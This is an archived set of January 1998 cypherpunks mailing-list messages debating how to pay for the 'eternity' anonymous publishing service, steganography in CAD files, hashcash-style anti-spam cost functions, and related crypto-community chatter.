In-Reply-To: <199801182053.OAA18106@einstein.ssz.com>
Message-ID: <19980118213138.54953@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Jan 18, 1998 at 02:53:54PM -0600, Jim Choate wrote:
> Forwarded message:
> 
> > Date: Sun, 18 Jan 1998 12:02:34 -0800
> > From: Kent Crispin <kent@songbird.com>
> > Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
> 
> > There are alternative ways of paying for the service that do not in
> > any way depend on ecash, and after thinking about it a bit, they seem
> > more robust, as well. 
> > 
> > The basic idea is as follows:  The fundamental eternity service is 
> > free to readers, and is financed entirely by writers.  The writers 
> > supply the disk space, the network bandwidth, and possibly pay for 
> > the software to support all this.
> 
> It is clear that there are two diametricaly opposed models of payment
> mechanisms and who those costs should fall on; producers or consumers.
> I personaly have no faith in systems where the producers bear the burden of
> the costs since they have no clear mechanism to obtain the funds to finance
> the enterprise in the first place.

You must find the advertising business completely mystifying, then.

> Imagine for a moment that a couple of persons come into possession of a set
> of documents which would cause considerable political embarassment and legal
> difficulties for a head of the local government.
> 
> Why should these two individuals pay to have their data dissiminated to
> anyone who wants it? It certainly isn't going to improve their social,
> political, or professional standing since the server will anonymize the
> data. They then have two options, release it themselves and hope for the
> best (and hence reap the benefit of any economic benefits that might acrue)
> or do nothing with it.

You pay to have your data disseminated in a form that you can be later
paid -- for example, leave the juciest part of the data in encrypted
form, along with a public key through which payment options can be
negotiated. 

[...]
> I guess the question boils down to why the individual operator in running
> the server in the first place. I assume a priori that the goal of both the
> submitter and the operator is to make a reliable income from the users of
> the service since there are clearly many more consumers of information than
> producers of it.

Why on earth do you try to be an ISP, then?  You pay for disk drives 
for other people to store their data, and make it available to the 
world.  The eternity service is actually very similar.

Given a protocol such as I described, you could move to Data Haven
Island, and charge up front to supply pornographers with an entrance
to the eternity service, while John Young could wallow in righteous
ego gratification as he provides space for morally important documents
by donating his disk space to eternity.  You do it for the money, he
does it for the buzz -- there are all kinds of ways to get paid. 

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Jan 1998 10:40:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CAD Stego (fwd)
Message-ID: <1.5.4.32.19980119023728.0070d8d0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

>This suggestion is unworkable in application.

Why the focus on color, the easiest thing to avoid using,
or layers, ditto? Superfluous for serious CAD, these 
dainty decorations from Martha Stewartville.

Most messages could be concealed in "hatched" objects,
bit-bloated as they are, indistinguishable from the elements
used to hatch. All black and white; maybe a dot of red for
cashmere dupe.

In fact, CAD is so bloated with dumb cad-jockey features,
and sleazebag work-monitoring logs, it puts most ordinary 
programs (even air-boss MS) to shame, and could hide a 
herd of rustled Mex longhorns as easily as the Bush family 
hides dryhole oil reserves, without any more trickery than 
sandpapering new boots to look worn.

Anyway, Jim, I gather from your remarks that you've not fiddled
for endless low-paid months and years to figure out how to
cheat the evil bosses and automatic work-snoop feature,
while onion-siphoning the Net for horny fare under guise of 
urgent file transfer to foam-mouth ne'erpays.

Underground (so to speak) swapping of digital work avoidance
tips is a huge use of global bandwidth riding on the backs
of big fat docs for globular structures for maggoty thugs.

(Although not nearly as gigantic as the porn trade stego-supporting 
Net infrastructre growth -- over 50% of Net traffic and rocketing.)

Who knows how much illicit info is riding the porn river in and
out of the most secure sanctums of tyrants?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 19 Jan 1998 06:17:35 +0800
To: ravage@ssz.com
Subject: eternity economics (Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <199801182053.OAA18106@einstein.ssz.com>
Message-ID: <199801182140.VAA00472@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> Kent Crispin <kent@songbird.com> writes:
> > Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
> 
> > There are alternative ways of paying for the service that do not in
> > any way depend on ecash, and after thinking about it a bit, they seem
> > more robust, as well. 
> > 
> > The basic idea is as follows:  The fundamental eternity service is 
> > free to readers, and is financed entirely by writers.  The writers 
> > supply the disk space, the network bandwidth, and possibly pay for 
> > the software to support all this.
> 
> It is clear that there are two diametricaly opposed models of payment
> mechanisms and who those costs should fall on; producers or consumers.
> I personaly have no faith in systems where the producers bear the burden of
> the costs since they have no clear mechanism to obtain the funds to finance
> the enterprise in the first place.
> 
> Imagine for a moment that a couple of persons come into possession of a set
> of documents which would cause considerable political embarassment and legal
> difficulties for a head of the local government.
> 
> Why should these two individuals pay to have their data dissiminated to
> anyone who wants it? It certainly isn't going to improve their social,
> political, or professional standing since the server will anonymize the
> data. 

If the would be disseminater was happy to have their name associated
with the document, they could put it on their own web page.  The
problems may be that:

- they do not want to suffer the legal and extra-legal reprisals for
  posting, 

- they have little faith in the data remaining available for long on
  their web page, once well resourced determined attackers try to remove
  it.

Eternity helps here in that it obscures the poster's identity, and
reduces their exposure in that they personally don't have to send as
many messages.  Eternity also helps ensure continued availability, at
least while somebody is funding that availability.

> They then have two options, release it themselves and hope for the
> best (and hence reap the benefit of any economic benefits that might
> acrue) or do nothing with it.

Releasing the data themselves is problematic.  They may not wish to
accept the risk.  Eternity provides a way to pay someone else to take
the risks in ensuring availability.

> How about information to build man portable atomic bombs? It doesn't
> make sense to take all those chances and the data haven operators to
> take the chances when they will get at most the monetary input from
> a *single* party.  It is clear that these resources are clearly
> inferior to many parties paying to get the data.

The users is getting value for money from the eternity servers -- the
eternity server is providing the service of risk taking.

It is true that someone could pay for accessing the data, and resubmit
it to eternity with themselves as the beneficiary.  They would likely
want to undercut the price charged by the initial poster.  This
suggests a recursive auction market with prices falling over time.
The eternity server operators win in that they are being paid for
their services.

The original poster possibly doesn't make that much money, but the
operator could counter by reducing their prices over time to undercut
other copies also.

There are other ways where the submitter could get higher prices.  He
could for example post the data in encrypted form, and send the
decryption key to a high reputation third party to verify the
authenticity of the data.  He could then demand $10,000 for the key.

Bids would be placed by users interested in obtaining the data.  When
the bid price is reached the data is posted.  Bids would be held in
escrow by the third party.  In the event that the requested price is
not met the ecash could be returned to the bidders.


The market will discover the value of the risk taking services
provided by the eternity servers in that if the servers over-charge,
users will take their own risks, by starting their own servers.  If a
given server under-charges, other servers will sub contract to that
server.  

There is a risk here that the NSA may offer eternity services at
prices undercutting everyone else.  This risk suggests that users
would not necessarily select the cheapest services.  If this pattern
of usage emerges, it also suggests that the NSA would better optimise
their efficacy by not offering the cheapest prices.

The problem of preventing eternity servers sub-contracting all their
work to the cheapest eternity-server (the NSA operated servers)
suggests that it may be desirable to design a system so that the
poster, or some third party auditing agent is able to verify where
data resides.

I can not see how this can generally be achieved, because it seems
difficult to verify whether a server is sub-contracting or not.

So in conclusion the safest strategy seems to be to select random
servers regardless of price.  This results in a flat demand curve, and
no incentive for servers to offer cheap service.

The model is more complex that this in that there are different risk
documents and this risk would affect the price a submitter is willing
to pay.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 11:24:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: CAD Stego (fwd)
Message-ID: <199801190354.VAA20080@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 21:37:28 -0500
> From: John Young <jya@pipeline.com>
> Subject: Re: CAD Stego (fwd)

> Why the focus on color, the easiest thing to avoid using,
> or layers, ditto? Superfluous for serious CAD, these 
> dainty decorations from Martha Stewartville.

The reason I addressed them is that they were what you brought up. Those
dainty decorations are critical to every industrial use of CAD that I have
ever been exposed to or used in an industrial setting. I'll have to disagree
with your opinion  on their utility.

> Most messages could be concealed in "hatched" objects,
> bit-bloated as they are, indistinguishable from the elements
> used to hatch. All black and white; maybe a dot of red for
> cashmere dupe.

Ok, let's address hatching from the perspective of use as a means to encrypt
data. Let's further use AutoCAD since it is by far the most used in
industrial settings. I think you will find that most other CAD programs use
one or more of the methods in AutoCAD.

AutoCAD offers a standard set of hatching objects via the HATCH and BHATCH
commands. In both cases the actual hatch patterns are 1-bit patterns meant
to be tiled. The HATCH command itself is normaly used for gross backgrounds
and such because it doesn't respect object boundaries. The BHATCH command
does respect object boundaries and is used much more in industrial and
machine drafting. In both cases the color of both the background and line
color must be specified. The hatching pattern is then simply tiled across
the appropriate area. It is possible to add other non-standard hatch
patterns but again, they are 1-bit deep and tend to be regular so there
isn't a lot of room to put data.

It is possible to include AutoLisp routines to do such hashing but I fail to
see how one would stego encrypted data in source code describing how to draw
the pattern.

There are two means to store reference to those patterns in a file. The
first is simply to include a pointer to a standard table of hash patterns
that every copy of the program will understand. I suspect that there isn't
much room there for stego. Now if we extend the standard hash table we are
required to include those hash patterns in our file and suitable coding to
tell the foreign program to include them appropriately. I don't see a lot of
room there for stego. The alternate is to include the actual hash pattern in
the file specificaly not linked to the hash table, in other words an
indpendant object we will manipulate through normal mechanisms. While I
will agree that if you could guarantee that Mallet didn't actualy view the
file as a graphic but rather as a file via some sort of character editor
(eg od -c or od -h as the simplest) there isn't much room for getting caught.
However, if you were to bring it up as a graphic and view it you find the
actual hash pattern is limited because it can be of only a particular size
for the hashing display and handling routines to handle.

CAD programs at their basest level understand a limited set of objects;
coordinate pairs, sets of such pairs for drawing lines, and color. Other
geometric objects (eg circles or hatches) are usualy built up through some
sort of algorithmic application of these basic objects. In the better CAD
programs those objects are routines that are shared as standard functions in
the program or through a cookie-cutter mechanism. The way new functions are
added is to add some form of PDL (eg AutoLisp) function. The cookie-cutter
mechanism usualy is limited by the 1-bit depth and the limited size of the
patterns.

Let's look at the mechanism that most CAD and graphics programs use for
color manipulation. In very few programs that I have ever come across are
the colors of each pixel actualy represented by some depth that allows the
full range of colors for every pixel. In general some color map mechanism
that takes a limited set of colors (usualy arrayed in a table) and allows
the program to select a given color from that table. Such special effects as
color cycling are created by writing a program that dynamicaly changes the
color stored in each member of that table. This is very fast and allows
every pixel for a given color to change in concert instead of the delay of
having to go to every pixel and test its color and then change it; very
slow. The way that most programs allow more colors than allowed by a
given color table is they create some sort of interrupt for each line of the
dispaly when the display gets a retrace pulse. When this pulse happens (on a
1024 x 768 it occurs every 1/768 seconds - a long time by computer
standards) a routine changes the color map to the one appropriate for that
line of the display. Some higher performance displays use a d/a mechanism so
that each pixel on the display is addressible. These sorts of displays allow
the color map to be changed for each pixel but they are very expensive in
hardware and list price, both tend to limit the applicability to commen
stego exchange outside a limited group.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 19 Jan 1998 06:16:34 +0800
To: schear@lvdi.net
Subject: hashcash / Dwork-Naor paper (Re: RSA Conference: Deterence measures for SPAM)
In-Reply-To: <v03102802b0e4c4e06860@[208.129.55.202]>
Message-ID: <199801182157.VAA00551@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Steve Schear <schear@lvdi.net> writes on cypherpunks:
> Kevin McCurley, IBM, delivered a paper on using electronic commerce
> techniques (i.e., d-postage) to deter SPAM.  He cites a work by
> Cynthia Dwork and Moni Naor, "Pricing via Processing or Combatting
> Junk Mail," 
> http://www.wisdom.weizmann.ac.il/Papers/trs/CS95-20/abstract.html I
> wan't able to access that paper and would be interested to know how
> similar their appraoch is to HashCash.

I had a look and their approach is very similar to that of hashcash.
Thanks for posting the reference, I found the paper very interesting,
and have contacted the authors (and Kevin (who is also webmaster of
www.digicrime.com)) with comments.  Their work predates hashcash by
about 4 years.  They have the same idea of using a CPU cost function
to combat unsolicited bulk email and other unmetered resource abuses.

Their cost functions are not based on hash collisions, but on public
key problems.  The use of public key problems allows them to construct
a trap-door cost function.  The holder of the private key can compute
valid tokens cheaply.  This allows them to propose a third party which
sells bulk email tokens without itself having to have large CPU
resources.  Their example application is what they see as legitimate
bulk emails, like conference calls.  (I am not sure I always agree
with this -- I get no end of spam conference calls which I have no
interest in attending or submitting to, but the functionality of
trap-door cost functions does allow more flexibility).

Their cost functions are more expensive to verify than hashcash
because they involve modular exponentations.

I can simulate the short cut cost function functionality with
symmetric encryption techniques by modifying the hashcash protocol.
Users, or service providers wishing to participate in enabling a third
party to sell tokens to bulk emailers for their email address(es) can
aid the third party in bypassing the hashcash verification process on
their eternity filter.

This can be done with no databases on the ISP mail hub server
(preserving privacy), and with no real time communications required
between trusted bulk email token seller and mail hub.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 19 Jan 1998 05:02:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: diplomacy
In-Reply-To: <34C21266.142B@nmol.com>
Message-ID: <199801182057.VAA18102@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



bill payne wrote:

> I sure hope the following was diplomatic enough.
> 
> NSA exhibited NO SENSE OF HUMOR when I pointed out
> 'deficiencies' in its crypto algorithm work.  But, too,
> the agrieve Islamic fundamentalists may not have too good
> senses of humor.

[...]

> Sampling at the 1 Khz rate revealed that Windows
> occasionally did its own thing as a result of a task
> switch and, therfore, interrupts were missed.


I find it highly amusing that NSA would design supposedly secure crypto
systems on completely insecure operating systems.  If NSA's computers can
be taken out just by sending a few packet fragments with bad offsets or
macro viruses, that's beyond 'deficiencies' it's utter incompetance...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 20 Jan 1998 16:29:24 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
In-Reply-To: <199801182053.OAA18106@einstein.ssz.com>
Message-ID: <3.0.5.32.19980118220024.00839220@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> The basic idea is as follows:  The fundamental eternity service is 
>> free to readers, and is financed entirely by writers.  The writers 
>> supply the disk space, the network bandwidth, and possibly pay for 
>> the software to support all this.
>
>It is clear that there are two diametricaly opposed models of payment
>mechanisms and who those costs should fall on; producers or consumers.
>I personaly have no faith in systems where the producers bear the burden of
>the costs since they have no clear mechanism to obtain the funds to finance
>the enterprise in the first place.

Assume the existence of a for-profit service provider.
The service provider needs to cover the costs of the service,
plus enough profit to make the effort interesting.
The prices charged need to reflect the costs (or be higher)
or the service provider can't make money and goes out of business.
So what are the costs, and who can be talked into paying for them?

1) Storage of information - Storage currently costs < $1/MB for raw disk, 
and getting cheaper by the minute, but sysadmins, lawyers, etc.
cost money and they're not getting cheaper as fast.
The costs of the equipment for permanent storage are probably about
10-50% more than the costs for storing for 5 years;
the costs of administration (assuming inflation is limited to
some small number) can be covered by an annuity.
Every technology upgrade or two you need to copy the archives to 
new storage media, and data that doesn't get accessed often may
get migrated out to slower or perhaps even offline media;
storage contracts need to reflect that retrieving data that hasn't
been accessed in a while may involve some delay.

2) Transmission of information - Roughly proportional to MB/time -
unlike storage, this one's not predictable, unless the provider and
author agree in advance (e.g. N free accesses per year, per password.)
So the provider could charge the reader for access, or use advertising
banners to fund retrieval costs (if that remains a valid model
for financing the web over the next N years, especially if the
readers retrieve data through anonymizers.)

3) Legal defense - This one's harder to predict :-)  
The current US climate is that service providers are relatively immune 
as long as they cooperate with subpoenas and court orders,
discourage copyright violators, and avoid having legal knowledge of
the contents of their sites, but that could change.

>Why should these two individuals pay to have their data dissiminated to
>anyone who wants it?  It certainly isn't going to improve their social,
>political, or professional standing since the server will anonymize the

If they want their names known, they can include them in the contents
of the data that readers retrieve, independent of what the server does.
(Of course, they can forge other peoples' names as well :-)
And they can use pseudonyms, with or without digital signatures,
and accumulate reputation capital under those nyms.
If they want to collect money from the readers, that's independent -
they may be able to include advertising, or may sell the decryption
keys to the data for digicash or information using some contact mechanism,
or they may just be publishing their manifestos for The True Cause.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 11:37:02 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: NTY compression proposal (fwd)
Message-ID: <199801190401.WAA20181@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



All editing errors are my own, I re-formatted the original text to better
address the points.

Forwarded message:

> Date: Sun, 18 Jan 1998 19:17:32 -0800
> From: Steve Schear <schear@lvdi.net>
> Subject: Re: NTY compression proposal

> Compression efficiency depends upon

> 1) the entropy of the input data

We are looking at selecting 100 64-bit keys out of a set of 2^64,
that is not a lot of opportunity there, given a random key generation
process, for a lot of commen patterns in the key set. If we don't have a
lot of commen patterns in the text we don't get a lot of compression.

> 2) the allowable losses

In this case we can't afford any loss.

> 3) finding an efficient algorithm to code for that entropy.

Which if we do the math requires something in the neighborhood of 33:1,
for a loss-less algorithm that's a pretty hurky boundary condition.

> I think I'm on fairly firm ground assuming that key data entropy is very=
>  high and therefore little or no compressible is feasible.

My point exactly, which would lead us to the conclusion that our requirement
of a 33:1 compression factor is not realizable.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 11:40:28 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Future War on TDL...
Message-ID: <199801190408.WAA20234@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Check out Futurewar on The Discovery Channel, it's been playing since 8pm
Central. Bruce Sterling appears for a blipvert.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Otto Matic" <ott0matic@hotmail.com>
Date: Mon, 19 Jan 1998 14:26:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Nanotechnology
Message-ID: <19980119060838.26648.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Cross posted to the "Highly Imaginative Technology List" 
HIT-list@asisem.org

>------- Forwarded Message Follows -------
>Date:          Sun, 18 Jan 1998 23:14:32 -0500
>From:          Nathan Russell <frussell@frontiernet.net>
>Reply-to:      frussell@frontiernet.net
>To:            HIT-list@asisem.org
>Subject:       Re: HIT: Fwd: (Fwd) Re: Nanotechnology
>
>Otto Matic wrote:
>> 
>> >Orinally posted to the cypherpunks list cypherpunks@cyberpass.net.
>> >
>> >------- Forwarded Message Follows -------
>> >Date:          Sat, 17 Jan 1998 11:45:36 -0500
>> >From:          ghio@temp0181.myriad.ml.org (Matthew Ghio)
>> >Subject:       Re: Nanotechnology
>> >To:            cypherpunks@cyberpass.net
>> >Reply-to:      ghio@temp0181.myriad.ml.org (Matthew Ghio)

Matthew Ghio Wrote to the Cypherpunks:

<<<SNIP>>>

>> >So roughly 8 months just to build one copy, rather than to achieve
>> >world domination. :)
>> >
>> >Still, unless I'm way off on these estimates, it's within the right
>> >ballpark.  If the cubes were 1 cm, you could make copies in less
>> >than a day, assuming it didn't get too hot at that power level. 
>> >Just figure out how you're going to feed the electricity and raw
>> >materials into all those little things...
>
>You could direct the molecules the same way electron beams are steered
>in a TV > > > >This sort of replicator is not what is usually
>considered > >nanotechnology, but if it actually worked, such a >device
>could become 
> >quite popular.

Nathan Russell wrote to the HIT-List

Yeah... what about making microchips, LSD or diamonds - all of which
have very high value/mass ratios.  Or bio warfare agents - maybe in
cryogenic state to be warmed up when finished.  What about more
complicated lifeforms - like people.  It would be hard to figure out
what to use for currancy, though - in Star Trek, Latinum is assumed,
according to one book, to be dependent for its properties on a huge
number of molecular legs resting against each other rather like the
fins of an artichoke steamer - can't be replicated because unless the
molecule is complete each leg creates an unequal force on its
neighbors and they flip into a non-latinum position.  
 Not that there wouldn't be positive elements - medicine would be very
cheap.  In fact, a pound - or maybe a mole - of anything with value
would cost no more than its component elements, plus labor.  What
about little self- 'replicating' robots that go into a landfill and
produce an army of themselves, turning excess elements into something
useful.  

BTW, could living things be replicated or would the structure be too
complex?  Intelligence supposebly depends on electrons moving in tiny
protein quantom channels in the brain in a completely unprodictable
way, telpathy is the electrons becoming quantom linked.  That could be
hard to replicate.

-Nathan

___END FORWARDED___

Thought you cypher punks would like to see this.

Otto

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 20 Jan 1998 16:29:51 +0800
To: Ryan Lackey <matt.barrie@stanford.edu>
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <3.0.5.32.19980117194905.008024e0@pobox1.stanford.edu>
Message-ID: <3.0.5.32.19980118221351.0083a220@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:33 AM 1/18/98 EST, Ryan Lackey wrote:
>Documents by specification last only as long as someone is willing to pay
>to keep them up.  This is not necessarily forever.  

But it can be, and the costs of doing so aren't much higher than
storing it for the first couple of years.  Depends on what service
the customer wants to buy.  And there are applications that
require more than 100 years of data protection, e.g. ownership
of copyrights which last 50 years beyond the author's death.

But for Matt Barrie's question, any permanent document will do.
>> Can we assume that using Moore's law this is at
>> least 1 bit every 18 months for symmetric crypto? 
>Do the math, though, for 128bit.  There are traditional analyses 
>which include the amount of silicon on the earth, the number of atoms
>in the universe, etc.  The general consensus is that traditional 
>techniques are not feasible for brute forcing 128bit ciphers before 
>the heat death of the universe.

Hard to say.  Assuming that Quantum Cryptography doesn't allow
finite-sized computers to do large exponentially complex calculations
in short finite time, you're probably limited by the number of atoms
in the available supply of planets, and Heisenberg may still get you
if that's not a low enough limit.  Moore's law isn't forever.
But there's no particular reason to limit RC4 or RC5 to 128 bits;
those are convenient sizes for MD5 hashes of passphrases.
So if you're paranoid, use RC4-256 and superencrypt with 5-DES.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 20 Jan 1998 16:47:15 +0800
To: cypherpunks@toad.com
Subject: API Specification for the AES
Message-ID: <3.0.5.32.19980118221603.0083a9f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Fri, 16 Jan 1998 14:59:37 -0500
>To: smid@csmes.ncsl.nist.gov
>From: Jim Foti <jfoti@nist.gov>
>Subject: API Specification for the AES
>
>Hello-
>
>As promised, we have placed on our AES Home Page a specification of the API
>to be used for AES submissions (for both Java and ANSI C implementations).
>It is available at <http://csrc.nist.gov/encryption/aes/api/api.htm>.
>
>As with past messages, this is being sent to all persons who have expressed
>an interest in the AES development effort (one way or another) within the
>last year. 
>
>Regards,
>Jim
>
>
>*******************************************************************
>Jim Foti
>
>Security Technology Group
>Computer Security Division
>National Institute of Standard and Technology (NIST)
>
>TEL: (301) 975-5237
>FAX: (301) 948-1233
>
>*******************************************************************
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Jan 1998 11:24:44 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: let's do it: NYT ad with hash of fingerprints (fwd)
Message-ID: <1.5.4.32.19980119032518.00b1fda4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote:

>What do you mean that you must include ID?  Someone must give an email
>address, or phone number?  Should be ok to fit one of those in the
>remaining 24 - 32 chars.

ID once meant name, address and telephone number, now a name, tel
num and e-mail is okay (along with "Advt").  The NYT claims it owes this 
to its readers to show who's not who.

The "ads" are called "reader notices" by the NYT, which calls to verify
the bona fides of the purchaser. And they will not publish everything
requested (no vitriol, darn it). There's vetting but mawky pleas swing
the censor, indeed, the vetter seems to boost haywire to keep the 
mad buying. Is that not a Brit legacy, too?

Here's the poop for arrangements (as of 1/96):

Reader Notice
The New York Times
226 West 43rd Street
New York, NY 10036

Vox: 1-800-421-4571
Fax: 201-343-6703






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 20 Jan 1998 17:08:24 +0800
To: cypherpunks@www.video-collage.com
Subject: Re: Deriving economic profits from writing FREE software?
In-Reply-To: <slrn6c0bra.sic.igor@manifold.algebra.com>
Message-ID: <3.0.5.32.19980118222710.0083aab0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:11 PM 1/16/98 -0600, Igor wrote:
>However, aside from the psychic benefits, I would like to somehow derive
>an economic profit from being a freeware author. So far, I feel that the
>status of the author of a popular package does sound good on a resume, but
>it is as far as I could get.
>
>Does anyone else feel the same way? Has anybody come up with a way to 
>cash in on the free programs that he writes? 

There's the standard shareware model - ask for $25.
There's the Cygnus model - charge money for support.
There's the Netscape/McAfee/etc. model - free for personal use,
	charge money to companies that use it.
There's the Eudora model - basic version free, bells&whistles extra.
There's the advertising-banner model - the software/service is free,
	but usage hits an advertising banner in some way that
	filters money back to you.

There are probably a lot more ways to do it as well, but it's a start.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 19 Jan 1998 07:49:48 +0800
To: rfarmer@HiWAAY.net
Subject: let's do it: NYT ad with hash of fingerprints
In-Reply-To: <Pine.OSF.3.96.980118150957.10460A-100000@fly.HiWAAY.net>
Message-ID: <199801182321.XAA00251@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Randall Farmer <rfarmer@HiWAAY.net> writes:
> > > [...] perhaps by looking in the NY Times for 1 Jan 1999 which has a
> > > full page ad taken out by Cypherpunks Anonymous with the PGP public
> > > keys for the 100 leading cypherpunks.
> > 
> > Pretty expensive and rather unrealistic I suspect. 
> 
> The NYT ad? I think that was at least partly a joke (besides, if
> some cypherpunks did take out an ad, I'd predict propaganda in 2/3
> of the page and fine-print PGP-key fingerprints in the rest :).

I would have thought you would take out a cheap personals section
advertisement and print one hash output and a URL.  The hash ouput
would be the hash of the hashes of a chosen set of public key
fingerprints.

Say some group of list members ponies up the cost of the ad, and then
a list of people wishing to have their key hashed is drawn up.  We
collect their public keys, post them on the web page, and take out the
ad.

I would be interested to do this.  What do personals ads in the NYT
cost?

We might also like to think before hand about how to obtain best
utility from the hash we publish.  We could even offer a key server
with a regularly published hash which retained information to inform
which subset of keys corresponds to each days hash output
advertisement.

You may as well include a second hash for a time stamping service hash
tree output while you're at it.  (Or we could combine the two hashes
into one hash).

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wayne Radinsky <waynerad@oz.net>
Date: Mon, 19 Jan 1998 15:55:18 +0800
To: "'Vladimir Z. Nuri'" <waynerad@oz.net>
Subject: RE: rant on the morality of confidentiality
Message-ID: <01BD246B.A7D1FF60@sense-sea-pm3-27.oz.net>
MIME-Version: 1.0
Content-Type: text/plain




> dilemmas do not prove a concept does not exist.

That's correct.  My point is natural selection can explain
why the dilemma exists.

> there are pretty clear cut cases

Natural selection also explains why there are "clear cut" cases, 
